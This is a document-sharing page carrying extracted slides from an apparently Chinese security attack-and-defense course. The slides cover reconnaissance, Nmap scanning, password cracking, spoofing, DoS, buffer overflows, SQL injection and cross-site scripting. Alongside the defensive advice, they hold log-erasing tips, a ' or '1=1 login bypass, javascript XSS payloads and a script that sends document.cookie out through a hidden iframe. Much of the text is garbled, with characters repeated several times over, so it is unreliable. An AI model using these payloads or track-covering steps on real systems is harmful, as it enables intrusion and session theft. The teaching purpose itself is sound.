安全攻防實踐課程_第1頁
安全攻防實踐課程_第2頁
安全攻防實踐課程_第3頁
安全攻防實踐課程_第4頁
安全攻防實踐課程_第5頁
已閱讀5頁,還剩92頁未讀 繼續免費閱讀

下載本文檔

版權說明:本文檔由用戶提供并上傳,收益歸屬內容提供方,若內容存在侵權,請進行舉報或認領

文檔簡介

安全攻防實踐穆顯亮課程內容2安全攻防知識體知識域安全攻防基礎網絡攻擊基本概念術語安全漏洞基礎安全攻防實踐緩沖區溢出原理與實例攻擊目標信息收集密碼破解原理與實例拒絕服務攻擊原理與實例網頁腳本攻擊原理與實例欺騙攻擊原理與實例安全漏洞檢測滲透測試基本流程知識子域信息安全漏洞知識域:安全攻防基礎知識子域:網絡攻擊基本概念術語了解網絡攻擊的基本常識了解黑客攻擊的常用術語知識子域:網絡攻擊基本流程了解網絡攻擊的基本步驟了解網絡攻擊各個階段常用的攻擊手段和工具3網絡攻擊基本概念及術語網絡攻擊的方式主動攻擊:掃描、滲透、拒絕服務……被動攻擊:嗅探、釣魚……一些術語后門、RootKit0-day提權社會工程學BotNet(僵尸網絡)B/S(Browser/Server)……4攻擊的過程5踩點定位入侵留后門抹去痕跡信息收集分析目標實施攻擊方便再次進入清理入侵記錄踩點-信息收集6具體見后面介紹為什么要收集信息獲取攻擊目標大概信息網絡信息主機信息應用部署信息……指導下一步攻擊行為信息收集的方式社會工程學媒體(如搜索引擎、廣告介紹等)網絡工具的探測定位-分析目標為什么需要分析目標確定收集信息的準確性更準確的判斷(例如:index.ycs是java開發,開發人員修改了腳本后綴以迷惑攻擊者)攻擊方式及工具路徑的選擇分析目標的方法掃描漏洞庫論壇等交互應用7入侵-多種多樣的入侵方式針對配置錯誤的攻擊-IPC$的攻擊針對應用漏洞的攻擊-unicode緩沖區溢出攻擊-idq緩沖區溢出電子欺騙攻擊-ARP欺騙拒絕服務攻擊-synflood針對弱口令的攻擊-口令破解利用服務的漏洞-本地輸入法漏洞利用應用腳本開發的漏洞-SQL注入利用人的心理-社會工程學攻擊……8后門可以作什么方便下次直接進入監視用戶所有行為、隱私完全控制用戶主機后門放置方式如果已經入侵簡單!如果尚未入侵手動放置利用系統漏洞,遠程植入利用系統漏洞,誘騙執行后門-方便下次進入9特洛伊木馬隨系統自啟動動修改注冊表服務Ini文件RootKit設備驅動腳本后門難以查找隱藏賬號考驗管理人員員耐心與細心心后門-方式10改寫訪問日志志例如:IIS訪問日志位置置%WinDir%\System32\LogFiles\W3SVC1\exyymmdd.log改寫日志的技技巧修改系統日期期刪除中間文件件刪除創建的用用戶抹去痕跡11信息收集與密密碼破解知識子域:攻攻擊目標信息息收集了解目標系統統網絡地址、、軟件版本等等信息獲取方方式了解網絡設備備、系統軟件件、應用軟件件掃描攻擊的的常用工具知識子域:密密碼破解原理理與實例了解密碼破解解技術原理和和口令安全基基本知識了解密碼破解解常用工具及及密碼字典概概念12信息收集技術術公開信息的合合理利用及分分析IP及域名信息收收集主機及系統信信息收集系統服務信息息的收集系統、服務及及應用漏洞信信息收集13信息收集技術術-公開信息的分分析公開信息的合合理利用和分分析-信息后面能反反饋出什么??從著名的”照片泄密”案件到“如何何用google入侵網站”1964年《中國國畫畫報報》封面面衣著著判判斷斷::北北緯緯46度至至48度的的區區域域-齊齊齊哈哈爾爾與與哈哈爾爾濱濱之之間間所握握手手柄柄的的架架式式->油井井的的直直徑徑鉆井井與與背背后后油油田田間間的的距距離離和和井井架架密密度度->儲量和和產量因此設設計出出適合合中國國大慶慶的設設備,,一舉舉中標標14信息收集技技術-搜索引引擎網站信信息舉例::某網網絡提提供商商在其其網站站上宣宣傳“特惠惠服務務器租租用::RedHatLinux8.0支持MYSQL/PHP采用性性能優優異的的Apache1.3.XXWeb服務器器”搜索引引擎Google搜索例:某某Web服務器器存在在致命命錯誤誤腳本本“5sf67.jsp”攻擊者者可通通過搜搜索引引擎查查找存存在該該錯誤誤腳本本的網網站15信息收收集技技術-域名與與IP查詢16域名與與IP信息收收集─WhoisWhois是一個個標準準服務務,可以用來查詢詢域名名是否被被注冊以及注冊的詳細資資料Whois可以查查詢到到的信信息域名所所有者者域名及及IP地址對對應信信息聯系方方式域名到期日日期域名注注冊日期域名所使用用的DNSServers……信息收收集技技術-域名與與IP查詢17域名與與IP查詢─nslookup操作系系統自自帶命命令,,主要是用來查詢詢域名名名稱稱和IP之間的對應關系網絡狀狀況查查詢─Ping系統自自帶命命令,,測試試與遠端端電腦腦或網絡設設備的連接狀況網絡路路徑狀狀況查查詢─tracert系統自自帶命命令,,測試試與遠遠端電電腦或網絡設設備之之間的路徑信息收收集技技術-系統鑒鑒別1.DNS的hinfo紀錄2.Bannergrab3.二進制制文件件法4.TCP/IP協議棧棧檢測測法5.ICMP堆棧指指紋技技術18系統鑒鑒別-DNS的hinfo記錄19系統鑒鑒別-服務旗旗標檢檢測服務旗旗標檢檢測法法[root@pooh]#telnet3DebianGNU/Ltargetlogin:Redhat:/etc/issue、/etc/bsd:/etc/motdSolaris:/etc/motd缺陷::不準準確,,負責責任的的管理理員一一般都都修改改這個個文件件20FTP回顯信息操作系統回顯Web回顯信息系統鑒別-二進制文件分分析法得到遠程系統統的一個二進進制文件例如1.webserver目錄下產生的的core文件2.配置不當的ftpserver下的二進制文文件……利用file、readelf命令等來鑒鑒別21系統鑒別-TCP/IP協議棧檢測測法其原理是不不同廠家的的IP協議棧實現現之間存在在許多細微微的差別,,通過這些些差別就能能對目標系系統的操作作系統加以以猜測。主動檢測被動檢測22系統鑒別-ICMP堆棧指紋技技術23通過端口掃掃描確定主機開放的的端口,不同的端口口對應運行著的不不同的網絡絡服務端口測試數數據包測試響應數數據包信息收集技技術-端口掃描我知道主機機上開放的的端口了24端口掃描類類型常規掃描(tcpconnectscan)半打開掃描描(tcpsynscan)隱秘掃描((StealthScan)SYN/ACKscan:發送一個個SYN/ACK分組,測知防火墻墻的規則設設計。它可可確定防火火墻是否只只是簡單的的分組過濾濾(只允許已建建立好的連連接);還是一個個基于狀態態的防火墻墻(可執行高級級的分組過過濾)FINscan:發送FIN分組,目標標系統應給給所有關閉閉著的端口口發回一個個RST分組,這種種技巧通常常只工作在在基于UNIX的TCP/IP協議上;Xmasscan:這一技巧巧是往目標標端口發送送一個FIN、URG、PUSH置位的分組組,如果目目標端口關關閉,則返返回一個RST分組;Nullscan:發送所有有標識位復復位的TCP分組;UDP掃描25端口掃描-常規掃描26掃描的方法──TCPConnectScan主要是利用用TCP三次握手(Three-wayhandshaking)的連接方式來達到掃描的目的AB1.SYN2.SYN+ACK3.ACK三次握手使用Nmap做TCPConnectScan端口掃描-半打開掃描描27掃描的方法──TCPSYNScan沒有完成三三次握手如左上圖,當主機A收到主機B的回應后,並不會回傳ACK數據包給主機B。TCPSYNScan的優缺點優點:由于沒有完成TCP三次握手,所以不會在目標主機上留下記錄。缺點:需有管理者的權限才可執行TCPSYNScan(以左上圖為例,必需要有主機A的管理者權限)。AB1.SYN2.SYN+ACK3.ACK三次次握握手手使用用Nmap做TCPSYNScan端口口掃掃描描-UDP掃描描28掃描描的方方法法──UDPPortScan由掃描描主主機機發發出UDP數據據包給目目標標主主機機的UDPPort,並並等等待待目目標主機Port送回回ICMPUnreachable信息息。若收到目標主機Port傳回的ICMPUnreachable信息,則表示該Port處于關閉的狀態。若沒有收到目目標主機Port傳回的ICMPUnreachable信息,則表示該Port可能處于Listen狀態。UDPPortScan的缺點UDP協議不可靠可能被防火墻過濾掉使用Nmap做udpScan端口掃描策略略隨機端口掃描描慢掃描碎片掃描欺騙掃描……29信息收集技術術-漏洞掃描根據目標主機機開放的不同同應用和服務務來掃描和判判斷是否存在在或可能存在在某些漏洞意義進行網絡安全全評估為網絡系統的的加固提供先先期準備被網絡攻擊者者加以利用來來獲取重要的的數據信息30對一個信息系系統來說,它它的安全性不不在于它是否否采用了最新新的加密算法法或最先進的的設備,而是是由系統本身身最薄弱之處處,即漏洞所所決定的。只只要這個漏洞洞被發現,系系統就有可能能成為網絡攻攻擊的犧牲品品。信息安全的“木桶理論”31信息收集技術術-漏洞掃描工具具網絡設備漏洞洞掃描器CiscoAuditingTools集成化的漏洞洞掃描器NessusShadowSecurityScannereEye的RetinaInternetSecurityScannerGFILANguard專業web掃描軟件IBMappscanAcunetixWebVulnerability數據庫漏洞掃掃描器ISSDatabaseScanneroscannerOracle數據庫掃描器器Metacoretex數據安全審計計工具工具介紹-端口掃描Nmap簡介被稱為“掃描描器之王”有forUnix和forWin的兩種版本需要Libpcap庫和Winpcap庫的支持能夠進行普通通掃描、各種種高級掃描和和操作系統類類型鑒別等使用-sS:半開式掃描-sT:普通connect()掃描-sU:udp端口掃描-O:操作系統鑒別別-P0:強行掃描(無無論是否能夠夠ping通目標)-p:指定端口范圍圍-v:詳細模式32工具介紹-端口掃描SuperScan簡介基于Windows平臺速度快,圖形形化界面使用傻瓜化33工具介紹-漏洞掃描Nessus構架服務器端:基基于Unix系統客戶端:有GTK、Java和Win系統支持運作客戶端連接服服務器端,并并下載插件和和掃描策略真正的掃描由由服務器端發發起兩者之間的通通信通過加密密認證優勢:具有強大的插插件功能完全免費,升升級快速非常適合作為為網絡安全評評估工具34工具介紹-漏洞掃描X-Scan國產自主開發發完全免費比較古老,缺缺乏維護35工具介紹-web安全掃描IBMAppScan36AcunetixWebVulnerabilityScanner優秀的Web安全測試軟件件37密碼破解-利用人性懶惰惰38密碼破解方法法密碼窮舉暴力破解密碼工具密碼暴力破解工工具密碼字典生成工工具密碼破解-密碼窮舉39密碼明文對明文密碼進行加密對比密文更換密碼明文已知密碼加密密算法及密文文情況下的破破解方法ID:cisppsw:123456Ok,youcanlogininID:cisppsw:No,youcannotloginin112123123412345123456OK,youcanlogininNo,youcannotlogininNo,youcannotlogininNo,youcannotlogininNo,youcannotloginin密碼破破解-口令暴暴力猜猜解40破解工具JohntheRipperL0Phtcrack……41根據用戶規規則快速生生成各類密密碼字典提高密碼破破解效率密碼破解知識識的具體體體現攻擊者常用用的工具……字典生成器器42系統及應用安安全策略對對抗密碼限制密碼嘗嘗試次數限制必須提提供安全的的密碼密碼有效期期等好的密碼碼特征自己容易記記住,別別人不好好猜……密碼破解安安全防御御43欺騙攻擊擊與拒絕絕服務攻攻擊44知識子域域:欺騙攻擊擊原理與與實例理解IP欺騙、ARP欺騙、DNS欺騙的原原理和危危害了解防范范欺騙攻攻擊的基基本方法法知識子域域:拒絕服務務工具原原理與實實例理解SYNFlood、UDPFlood、Land攻擊、TearDrop攻擊等典典型DoS攻擊的原原理及危危害理解DDoS攻擊的原原理了解防范DoS/DDoS攻擊的基本方方法欺騙攻擊定義義BACHello,I’mB!欺騙攻擊(Spoofing)是指通過偽偽造源于可信信任地址的數數據包以使一一臺機器認證證另一臺機器器的復雜技術術45欺騙攻擊的主主要方式IP欺騙((IPSpoof)DNS欺騙ARP欺騙TCP會話劫劫持路由欺欺騙……46客戶服務器器Synsend連接請請求回應((ISN)Syn+ack確認((ISN+1)會話過過程47IP欺騙基基礎知知識-三次握握手IP欺騙實實現步驟IP欺騙攻攻擊方方法中中包括括了一一系列列攻擊擊步驟驟確認攻擊目標使要冒充主機無法響應目標主機猜正確的序數冒充受信主機進行會話48IP欺騙騙實實例例講解解BAC同步flood攻擊連接請求求偽造B進行系列列會話A的序數規規則49防止IP欺騙50嚴格設置置路由策策略:拒絕來來自網上上,且聲聲明源于于本地地地址的包包使用最新新的系統統和軟件件,避免免會話序序號被猜猜出使用抗IP欺騙功能能的產品品嚴密監視視網絡,,對攻擊擊進行報報警ARP欺騙基礎礎-Arp協議工作作過程bb:bb:bb:bb:bbcc:cc:cc:cc:ccaa:aa:aa:aa:aaWho’sIPisWho’sIPis192.168.1.aMACaa:aa:aa:aa:isIsee,Iwillcache51ARP欺騙實現現bb:bb:bb:bb:bbcc:cc:cc:cc:ccaa:aa:aa:aa:aaMACcc:cc:cc:cc:ccisIsee,IwillcacheMACdf:df:df:df:dfisIcouldn’tfind52Internet地址物物理地址址cc:cc:cc:cc:ccARP欺騙防御御53使用靜態態ARP緩存IP與MAC地址綁定定ARP防御工具具DNS欺騙基礎礎-DNS協議工作作過程其他DNSIwillcacheIdon’tknow,IwillaskotherIt’sinmycache54DNS服務器客戶機客戶機DNS服務器DNS欺騙實現現Idon’tknow,IwillaskotherOtherDNSIwillcacheIt’sinmycache55攻擊者DNS服務器DNS服務器客戶機DNS欺騙防御御56安裝最新新版本的的DNS軟件安全設置置對抗DNS欺騙關閉DNS服務遞歸歸功能限制域名名服務器器作出響響應的地地址限制域名名服務器器作出響響應的遞遞歸請求求地址限制發出出請求的的地址其他欺騙騙攻擊-路由欺騙ICMP重定向報文欺騙騙RIP路由欺騙騙源徑路由由欺騙57拒絕服務務攻擊定定義拒絕服務務式攻擊擊(DenialofService),顧名思思義就是是讓被攻攻擊的系系統無法法正常進進行服務務的攻擊擊方式。。拒絕服務務攻擊方方式利用大量量數據擠擠占網絡絡帶寬利用大量量請求消消耗系統統性能利用協議議實現缺缺陷利用系統統處理方方式缺陷陷58典型的拒拒絕服務務攻擊方方式SYNFloodUDPFloodTeardropLANDSmurf……59(syn)Hello,I’mhere(syn+ack)I’mready?I’mwaiting……SYNFlood(syn)Hello,I’mhere?I’mwaiting……(syn)Hello,I’mhere……I’mwaiting……I’mwaiting……I’mwaiting……UDPFLOODUDPFlood1)大量UDP小包沖擊應應用服務器器(DNS、Radius認證等)2)利用系統統服務形成成流量(Echochargen)3)利用正常UDP服務發送大大流量形成成網絡擁塞塞61LAND攻擊運用IPSpoofing技術送出一一連串SYN數據包給目目標主機,,讓目標主主機系統誤誤以為這些些數據包是是由自己發發送的。由由于目標主主機在處理理這些數據據包的時候候,它自己己并無法回回應給自己己SYN-ACK數據包,因因而造成系系統當機。。621(SYN)hello,I’m1Syn+AckAckSYNSYN+ACKACKPSH1:1025……PSH1025:2049……PSH2049:3073……FINACKPSH1:1025……PSH1000:2049……PSH2049:3073……試圖重組時主機崩潰TearDrop(分片攻擊))63Smurf攻擊黑客偽裝受害者IP中間網站目標子網絡主機目標子網絡主機目標子網絡主機攻擊信息大量ICMP封包(Layer3)子網絡主機子網絡主機子網絡主機目標網站大量廣播(Layer2)64拒絕服務攻擊擊的危害消耗帶寬癱瘓服務器DNS網頁電子郵件阻塞網絡路由器交換器65DDoS攻擊原理66工具介紹TFN2KTrinoo67313352766527444udpmasterclient..主機列表telnetbetaalmostdone攻擊指令目標主機nc拒絕服務攻擊擊防御定期掃描過濾不必要的的端口與服務務節點配置防火火墻/DDOS設備過濾IP地址限制SYN/ICMP流量檢查來源68緩沖區溢出與與網頁腳本安安全69知識子域:緩緩沖區溢出原原理與實例理解緩沖區溢溢出的原理和和危害了解防范緩沖沖區溢出的基基本方法知識子域:網網頁腳本原理理與實例理解SQL注入攻擊的原原理和危害了解防范SQL注入攻擊的基基本方法理解跨站腳本本攻擊的原理理和危害了解防范跨站站腳本攻擊的的基本方法緩沖區溢出緩沖區溢出原原理緩沖區溢出簡簡單示例緩沖區溢出防防御70緩沖區溢出71原理緩沖區溢出攻攻擊利用編寫寫不夠嚴謹的的程序,通過過向程序的緩緩存區寫入超超過預定長度度的數據,造造成緩存的溢溢出,從而破破壞程序的堆堆棧,導致程程序執行流程程的改變。基礎知識堆棧寄存器指針緩沖區溢出基基礎-堆棧及指針堆棧棧概概念念一段連連續續分分配配的的內內存存空空間堆棧棧特特點點后進進先先出出堆棧棧生生長長方方向向與與內內存存地地址址方方向向相相反反指針針指針是指指向內存存單元的的地址寄存器有限存貯貯容量的的高速存存貯部件件,它們們可用來來暫存指指令、數數據和位位址34H12H78H56H0108HESP棧頂堆棧(AL)(AH)34H12H78H56H0106HESP棧頂72棧底棧底簡單示例例Buffer.c#include<stdio.h>intmain(){charname[8];printf("Pleaseinputyourname:");gets(name);printf("younameis:%s!",name);return0;}73程序作作用::將用戶戶輸入入的內內容打打印在在屏幕幕上簡單示示例74用戶輸入內容在8位以內時候,程序正常執行用戶輸入內容超過8位以后,程序執行產生錯誤簡單示示例由于返返回地地址已已經被被覆蓋蓋,函函數執執行返返回地地址時時會將將覆蓋內容當作返回地地址,然后后試圖執行行相應地址的指令,從而而產生錯誤誤。75當我們全部部輸入a時,錯誤指指令地址為為0x616161,0x61是a的ASCII編碼76內存底部內內存存頂部nameEBPret[cispcisp][][]堆棧頂部堆堆棧底部部堆棧情況nameEBPret[aaaaaaaa][aaaa][aaaa]由于輸入的的name超過了定義義變量的長長度(8位),堆棧棧中預計的的位置無法法容納,只只好向內存頂頂部繼續寫寫‘a’,由于堆棧的生生長方向與與內存的生生長方向相相反,用戶輸入的‘‘a’覆蓋了堆棧底部EBP和ret。程序在返返回時,將將EBP中的‘aaaa’的ASCII碼:0x61616161作為返回地地址,試圖執行0x61616161處指令,導導致錯誤,,形成一次次堆棧溢出77緩沖區溢出出危害尋找程序漏洞編制緩沖區溢出程序精確控制跳轉地址執行設定的代碼獲得系統權限或破壞系統危害:如如果可精精確控制制內存跳跳轉地址址,就可可以執行行指定代代碼,獲獲得權限限或破壞壞系統78緩沖區溢出其他知知識緩沖區溢溢出分類類堆溢出棧溢出Shellcode一段用于于溢出并并獲取權權限的代代碼……緩沖區溢溢出防御御編寫安全代代碼最根本的的解決方方法,對對輸入數數據進行行驗證緩沖區不可執執行技術術使被攻擊擊程序的的數據段段地址空空間不可可執行,,從而使攻擊者不可可能執行輸入緩沖區區的代碼碼指針完整性性檢查數組越界保保護79網頁腳本本安全腳本安全全的概念念SQL注入原理理及危害害跨站腳本本原理及及危害80概念腳本攻擊擊是針對對Web應用的攻攻擊腳本攻擊擊主要是是針對動動態網站站進行的的攻擊,,其原因因是在建建立動態態網頁的的過程中中沒有對對用戶的的輸入輸輸出進行行有效的的合法性性驗證動態網站站交互性::即網頁頁會根據據用戶的的要求和和選擇而而動態改改變和響響應,將將瀏覽器器作為客客戶端界界面自動更新新:即無無須手動動地更新新HTML文檔,便便會自動動生成新新的頁面面,可以以大大節節省工作作量因時因人人而變::即當不不同的時時間、不不同的人人訪問同同一網址址時會產產生不同同的頁面面81腳本分類類靜態腳本本HTML動態腳本本aspphpjspvbs…82SQL注入SQL注入(SQLInjection):程序序員在編編寫代碼碼的時候候,沒有有對用戶戶輸入數數據的合合法性進進行判斷斷,使應應用程序序存在安安全隱患患。用戶戶可以提提交一段段數據庫庫查詢代代碼,根根據程序序返回的的結果,,獲得某某些他想想得知的的數據或或進行數數據庫操操作操作系統Web應用數據庫服務器123調用數據庫查詢直接調用操作系統命令通過數據庫調用操作系統命令83SQL注入基礎知識識SQL(StructuredQueryLanguage):結構化的查查詢語言,是是關系型數據據庫通訊的標標準語言。查詢:Selectstatementfromtablewherecondition刪除記錄:deletefromtablewherecondition更新記錄:updatetablesetfield=valuewherecondtion添加記錄:insertintotablefieldvalues(values)常用函數Count()Asc(‘nchar’’),unicode(‘nchar’)mid(str,n1,n2),substring(str,n1,n2)84SQL注入簡單示例例Select*fromtablewhereuser=‘admin’andpwd=‘SdfG#345!’;adminSdfG#345!85Select*fromtablewhereuser=‘admin’andpwd=‘123’or‘1=1’admin123’or‘1=1由于密碼的輸輸入方式,使使得查詢語句句返回值永遠遠為True,因此通過驗驗證SQL注入范例-收集信息86http://xx.xxx.xx.xx/playnews.asp?id=772’and‘1=1MicrosoftOLEDBProviderforODBCDrivers錯誤'80040e14'[Microsoft][ODBCMicrosoftAccessDriver]字符串的語法法錯誤在查查詢表達式'id=772''中。/displaynews.asp,行31說明:數據庫為Access程序沒有對于于id進行過濾數據庫表中有有個字段名為為idSQL注入范例-操操作數據庫87SQL注入范例-執執行系統命令令8889SQL注入防防御開發時時過濾濾特殊殊字符符:單引號號、雙雙引號號、斜斜杠、、反斜斜杠、、冒號號、空空字符符等的的字符符過濾的的對象象:用戶的的輸入入提交的的URL請求中中的參參數部部分從cookie中得到到的數數據部署防防SQL注入系系統或或腳本本跨站腳腳本定義跨站站腳腳本本((CSS-CrossSiteScripting)在遠遠程程Web頁面面的的HTML代碼碼中中插插入入的的具具有有惡惡意意目目的的的的數數據據,,用用戶戶認認為為該該頁頁面面是是可可信信的的,,但但是是當當瀏瀏覽覽器器下下載載該該頁頁面面時時,,嵌嵌入入其其中中的的腳腳本本將將被被解解釋釋執執行行跨站站腳腳本本成成因因CGI程序序沒沒有有對對用用戶戶提提交交的的變變量量中中的的HTML代碼進行行過濾或或轉換。。這種攻擊擊利用的的是用戶戶和服務務器之間間的信任任關系,,以及Web站點沒有有使用有有效的輸輸入輸出出驗證來來拒絕嵌嵌入的腳腳本。90跨站腳本本危害1.獲取取其他用用戶Cookie中的敏感感數據2.屏蔽蔽頁面特特定信息息3.偽造造頁面信信息4.拒絕絕服務攻攻擊5.突破破外網內內網不同同安全設設置6.與其其它漏洞洞結合7.其它它91跨站腳本范例例-執行Javascript有很多種方式式可造成Javascript的執行,以下下舉例兩種最原始的范例例如下:第二種方式,,利用expression指令來造成javascript執行,范例如如下:92body{background-image:url("javascript:alert('XSS')");}body{background-image:expression(alert("XSS"));}跨站腳本危害害范例-Cookies竊取93Web服務器URL大小為0的iframe將字符編碼傳傳送varcode;vartarget="/?";info=escape(document.cookie);target=target+info;code="<iframestyle='display:none;'src=";code=code+target;code=code+"width=0height=0></iframe>";document.write(code);跨站腳本危害害-竊取Cookies更改Cookies成功獲取身份份94小結腳本攻擊從本本質上是一種種過濾不足造造成的攻擊腳本是不需要要編譯的程序序代碼,依賴賴腳本引擎來來解釋執行,,具有很好的的操作系統適適應性和可移移植性如果不可信的的內容被引入入到動態頁面面中,則無論論是網站還是是客戶機都沒沒有足夠的信信息識別這種種情況的發生生并采取保護護措施腳本攻擊方法法主要包括::SQL注入攻擊、命命令注入、跨跨站腳本攻擊擊等95謝謝,請提問問題!9、靜夜四無鄰鄰,荒居舊業業貧。。12月-2212月-22Thursday,December29,202210、雨中黃葉樹樹,燈下白頭頭人。。12:33:0212:33:0212:3312/29/202212:33:02PM11、以我獨獨沈久,,愧君相相見頻。。。12月-2212:33:0212:33Dec-2229-Dec-2212、故人人江海海別,,幾度度隔山山川。。。12:33:0212:33:0212:33Thursday,December29,202213、乍見翻疑夢夢,相悲各問問年。。12月-2212月-2212:33:0212:33:02December29,202214、他鄉生白白發,舊國國見青山。。。29十二二月202212:33:03下下午12:33:0312月-2215、比比不不了了得得就就不不比比,,得得不不到到的的就就不不要要。。。。。十二月2212:33下下午12月-2212:33December29,202216、行動動出成成果,,工作作出財財富。。。2022/12/2912:33:0312:33:0329December202217、做前,,能夠環環視四周周;做時時,你只只能或者者最好沿沿著以腳腳為起點點的射線線向前。。。12:33:03下午午12:33下下午12:33:0312月-229、沒沒有有失失敗敗,,只只有有暫暫時時停停止止成成功功!!。。12月月-2212月月-22Thu

溫馨提示

  • 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯系上傳者。文件的所有權益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網頁內容里面會有圖紙預覽,若沒有圖紙預覽就沒有圖紙。
  • 4. 未經權益所有人同意不得將文件中的內容挪作商業或盈利用途。
  • 5. 人人文庫網僅提供信息存儲空間,僅對用戶上傳內容的表現方式做保護處理,對用戶上傳分享的文檔內容本身不做任何修改或編輯,并不能對任何下載內容負責。
  • 6. 下載文件中如有侵權或不適當內容,請與我們聯系,我們立即糾正。
  • 7. 本站不保證下載資源的準確性、安全性和完整性, 同時也不承擔用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。

評論

0/150

提交評論